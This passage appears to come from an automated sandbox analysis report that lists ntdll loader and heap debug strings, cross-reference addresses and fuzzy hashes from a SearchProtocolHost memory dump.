                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 037F0EB5
                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 037F0DEC
                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 037F0E72
                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 037F0E2F
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 037FA7AF
                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 037FA79F
                                                                                      • LdrpDynamicShimModule, xrefs: 037FA7A5
                                                                                      • apphelp.dll, xrefs: 037B2382
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $ $0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • HEAP: , xrefs: 037914B6
                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03791648
                                                                                      • HEAP[%wZ]: , xrefs: 03791632
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                      • API String ID: 0-1145731471
                                                                                      • Opcode ID: 051bbc7a9c6ed5a1b58aba662045a607f7784a1815bd0d8948bf8c2afbc78459
                                                                                      • Instruction ID: 9971eca5edbaf997da9321870f31a7c63406958baa2896340fc5e5b25f3eaec5
                                                                                      • Opcode Fuzzy Hash: 051bbc7a9c6ed5a1b58aba662045a607f7784a1815bd0d8948bf8c2afbc78459
                                                                                      • Instruction Fuzzy Hash: 7EB18B39A106448FEF24CF69E890BADB7B5FF44714F18866AE921EB790D730E840CB10
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                      • API String ID: 0-2391371766
                                                                                      • Opcode ID: 2fa2fb2d0042ee143895dde28d0d16133b9772d881b22c7656964d0d48225214
                                                                                      • Instruction ID: dcb543ef1b9e91284f81d53333aee197cbc6d84673d30cf8226d0feeab039259
                                                                                      • Opcode Fuzzy Hash: 2fa2fb2d0042ee143895dde28d0d16133b9772d881b22c7656964d0d48225214
                                                                                      • Instruction Fuzzy Hash: A5B1C079614745AFE721EF94CC84B6BB7ECAB44714F0409A9FA50DB280D7B0E814CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                      • API String ID: 2994545307-2779062949
                                                                                      • Opcode ID: 5b9d943831fbe666a9ab9cddb74fb4a34cf5adfeffdb0cbb3a4c00e80f54372d
                                                                                      • Instruction ID: 1cd0ee17ae1140c418007cf3fe01a46fea172b085fa54f3ae954fb70bdb95704
                                                                                      • Opcode Fuzzy Hash: 5b9d943831fbe666a9ab9cddb74fb4a34cf5adfeffdb0cbb3a4c00e80f54372d
                                                                                      • Instruction Fuzzy Hash: C1A17D799016299BDB31DF64CC88BEAF7B8EF48700F1405EAE908A7250D7359E85CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                      • API String ID: 0-318774311
                                                                                      • Opcode ID: f80118a715aa21efca9c426aa8fc19fc9a83a2bb54999ff848c84f8543ab744d
                                                                                      • Instruction ID: 8901ef10357fa2ca1fe947447549efc2b631548ccc9c86ab57c4a0fbf054da36
                                                                                      • Opcode Fuzzy Hash: f80118a715aa21efca9c426aa8fc19fc9a83a2bb54999ff848c84f8543ab744d
                                                                                      • Instruction Fuzzy Hash: 8B818279208350AFE711DB54C858F6AFBE8EF84754F0809ADF945DB290DBB8DA40CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                      • API String ID: 0-373624363
                                                                                      • Opcode ID: 880ed4b676ac6d19d36de3216f39f02f6e8642f6802080ed402ff95a53a84b8e
                                                                                      • Instruction ID: 977efeefc30c4dbe978f77e3f174d3b068a5a436c3d051922743e215537965ba
                                                                                      • Opcode Fuzzy Hash: 880ed4b676ac6d19d36de3216f39f02f6e8642f6802080ed402ff95a53a84b8e
                                                                                      • Instruction Fuzzy Hash: C891D175A04259CFEF21CF98E4447ADB7B4FF44324F18429AE915AB390D378DA80DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • GlobalizationUserSettings, xrefs: 0386B3B4
                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0386B3AA
                                                                                      • TargetNtPath, xrefs: 0386B3AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                      • API String ID: 0-505981995
                                                                                      • Opcode ID: 50c4426343e094f93a5ff8e2b7b2438201f035fc170d422bf37638239cd4a001
                                                                                      • Instruction ID: 05ccf10542fec43b64716d49442a1211504aade220337f7970753b19649b471c
                                                                                      • Opcode Fuzzy Hash: 50c4426343e094f93a5ff8e2b7b2438201f035fc170d422bf37638239cd4a001
                                                                                      • Instruction Fuzzy Hash: 8D618F72941368ABDB22EF95DC9CBD9B7B8AB44714F0101E9E908EB250D774DE84CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                      • API String ID: 0-2283098728
                                                                                      • Opcode ID: 63ea48be8367dd934ac10e5d32aac4c07f386fca106f8d637dd4b241b1833af6
                                                                                      • Instruction ID: cb19e1493e732bb62b298c57050f65d70a371ce5f5531825520d448f43f3fd4b
                                                                                      • Opcode Fuzzy Hash: 63ea48be8367dd934ac10e5d32aac4c07f386fca106f8d637dd4b241b1833af6
                                                                                      • Instruction Fuzzy Hash: 575106357047019FD724EF38C888BADB7F5BB86710F18066DE7628B692E774A800DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • HEAP: , xrefs: 037EE442
                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 037EE455
                                                                                      • HEAP[%wZ]: , xrefs: 037EE435
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                      • API String ID: 0-1340214556
                                                                                      • Opcode ID: 7b5d8d38af865cba5b33807c8f64c634fd093e8f798e543d1790ab4e7558e25a
                                                                                      • Instruction ID: 11920d9484e245b80b35805d8dc0b82bfe1bc6249153e65a2bd977ca1be339d8
                                                                                      • Opcode Fuzzy Hash: 7b5d8d38af865cba5b33807c8f64c634fd093e8f798e543d1790ab4e7558e25a
                                                                                      • Instruction Fuzzy Hash: F4512935640784EFE712EBA8D888F5AFBF8FF09704F0849A5E5518B692D374E910DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpCompleteMapModule, xrefs: 037FA39D
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 037FA3A7
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 037FA396
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: 6e9f8a527512010d3f21d0836e788d4f46caa4079c94413549309adb280da06f
                                                                                      • Instruction ID: 8ef5c4275b788f6c1febd46cc5310843c374f8c81388c962cff8fa4f4c21ed05
                                                                                      • Opcode Fuzzy Hash: 6e9f8a527512010d3f21d0836e788d4f46caa4079c94413549309adb280da06f
                                                                                      • Instruction Fuzzy Hash: ED51F234A04B419FEB21DF6CC958BAAB7F4BF04714F5802A8EA569B7D1D770E900CB40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0383D7B2
                                                                                      • HEAP: , xrefs: 0383D79F
                                                                                      • HEAP[%wZ]: , xrefs: 0383D792
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                      • API String ID: 0-3815128232
                                                                                      • Opcode ID: 1e75d1531994a8c607ea1092baf54efddb6b546f8306dd3046e13bf9c303f49b
                                                                                      • Instruction ID: 83f39257e80f1dd3ca1b86ae9e5af9e6ee73b651a763ec037b3e5682edc93601
                                                                                      • Opcode Fuzzy Hash: 1e75d1531994a8c607ea1092baf54efddb6b546f8306dd3046e13bf9c303f49b
                                                                                      • Instruction Fuzzy Hash: 165126351402548EE764EB69C844772B3E1EB47288F1888C9E4D6CB385E675D44BDBE0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 038080F3
                                                                                      • Failed to reallocate the system dirs string !, xrefs: 038080E2
                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 038080E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1783798831
                                                                                      • Opcode ID: b704a11bbbf0f953df88b6fa7afdfb292e82e84a5d459406c318361d203acadc
                                                                                      • Instruction ID: 36018b790b75f8a69a86adde0268541f418c94311a09e352f2445a0f3a0093f6
                                                                                      • Opcode Fuzzy Hash: b704a11bbbf0f953df88b6fa7afdfb292e82e84a5d459406c318361d203acadc
                                                                                      • Instruction Fuzzy Hash: 284101B5510741ABC721FF68DD44B6BB7E8AF84710F0409AEF958EB291EB70D801CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                      • API String ID: 0-1151232445
                                                                                      • Opcode ID: e5aac5a53bebff0acad01907f2ae14a247473223e161ab3df23b14b063a6d38e
                                                                                      • Instruction ID: 4f202bbf49cc4db7063bde82db573aa682eacac6e79b34f51da9e63149b1d7cb
                                                                                      • Opcode Fuzzy Hash: e5aac5a53bebff0acad01907f2ae14a247473223e161ab3df23b14b063a6d38e
                                                                                      • Instruction Fuzzy Hash: 2041F4347802808FDF69EF6CC0D4B75B7E8AF09205F3C44E9D4879B66ACA65D486CB21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpAllocateTls, xrefs: 0380194A
                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03801943
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 03801954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-4274184382
                                                                                      • Opcode ID: 08617dcfc5e5bd861479d686b50a04079025147406ba8773587005418caaeb7a
                                                                                      • Instruction ID: d7604e486ca139db2311c883344092af477a1b3d694118d5c72da40648528c65
                                                                                      • Opcode Fuzzy Hash: 08617dcfc5e5bd861479d686b50a04079025147406ba8773587005418caaeb7a
                                                                                      • Instruction Fuzzy Hash: CF415AB9A00705EFDB15DFA8DC85BAEBBB5FF48310F048169E405AB251DB35A900CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpCheckRedirection, xrefs: 0381450F
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 03814519
                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03814508
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 0-3154609507
                                                                                      • Opcode ID: 26e1bbd097912c3a638a2ca14f2b8cf0889a4144ca45169552dc2395fca79439
                                                                                      • Instruction ID: af194048ab0eba2404ee7b8a9eb239e2a52803764f2c5848c373d74561a1f4dd
                                                                                      • Opcode Fuzzy Hash: 26e1bbd097912c3a638a2ca14f2b8cf0889a4144ca45169552dc2395fca79439
                                                                                      • Instruction Fuzzy Hash: 8841E2726067109FCB20DFDAD840A26B7FCAF48754F0906E9EC59DB255D730EA20DB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RtlCreateActivationContext, xrefs: 03802803
                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 03802808
                                                                                      • Actx , xrefs: 037C32CC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                      • API String ID: 0-859632880
                                                                                      • Opcode ID: 0311e41074f9cf618be5c674b1aa51efa2fb6d8d594e8a503e3149c1393fad0b
                                                                                      • Instruction ID: 46f4b07440e231bce56da58008b1f21118af1f40e23c97987623220aaf9985c3
                                                                                      • Opcode Fuzzy Hash: 0311e41074f9cf618be5c674b1aa51efa2fb6d8d594e8a503e3149c1393fad0b
                                                                                      • Instruction Fuzzy Hash: B931233A6103459FEB11CF58D8D4B9AB7A4EB48724F1884ACED05DF281CBB4E805CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0381B2B2
                                                                                      • GlobalFlag, xrefs: 0381B30F
                                                                                      • @, xrefs: 0381B2F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: 5e4ef3f8013fe4bcf97dbf5ef23749079c2e3256972b177ae5979139032a74ed
                                                                                      • Instruction ID: 6d0bbc2e04d0b9f67e753ec54f7b4791dce3ceeb840d95a0aceaa9f9b62b50e2
                                                                                      • Opcode Fuzzy Hash: 5e4ef3f8013fe4bcf97dbf5ef23749079c2e3256972b177ae5979139032a74ed
                                                                                      • Instruction Fuzzy Hash: CC312DB5A00219AEDB11EFE4DC85AEEBBBCEF44744F4404A9E605EB141D7749E148B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpInitializeTls, xrefs: 03801851
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 0380185B
                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 0380184A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-931879808
                                                                                      • Opcode ID: c59e6c82ce3681419ca18592dd1ddce89e14d3e16ef14520dc5a2966e726859b
                                                                                      • Instruction ID: b3f85036388edbc16f800e5ba8ffd51a410b2a85e4445949b8f307c2ed24d3b3
                                                                                      • Opcode Fuzzy Hash: c59e6c82ce3681419ca18592dd1ddce89e14d3e16ef14520dc5a2966e726859b
                                                                                      • Instruction Fuzzy Hash: 27316C75A20740EFEB20EB88DC85F6A77ADEB45754F4100BDE502AB282D770ED049BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 037D119B
                                                                                      • BuildLabEx, xrefs: 037D122F
                                                                                      • @, xrefs: 037D11C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                      • API String ID: 0-3051831665
                                                                                      • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction ID: 9b095940e975f763dfc1697f387fe553efda26478360eea678c66a215e638c63
                                                                                      • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                      • Instruction Fuzzy Hash: 51318176A00619BBDB11DB94CC44EAFBBBDEB84760F104425F904EB2A0D731DA059B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: d038e343b9b4c1fd623d248c12ea9947cf0c5b8e7f13286b75d90f34e93f3e8e
                                                                                      • Instruction ID: a7b9cf6cbc436d3e9141f57c0ade4f1d0b3909f1d2a72fc65421d3f27ed74fef
                                                                                      • Opcode Fuzzy Hash: d038e343b9b4c1fd623d248c12ea9947cf0c5b8e7f13286b75d90f34e93f3e8e
                                                                                      • Instruction Fuzzy Hash: A23267756087118BC724CF18C484B3EB7E6AFCA724F184A2EF9D59B290E734D944DB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
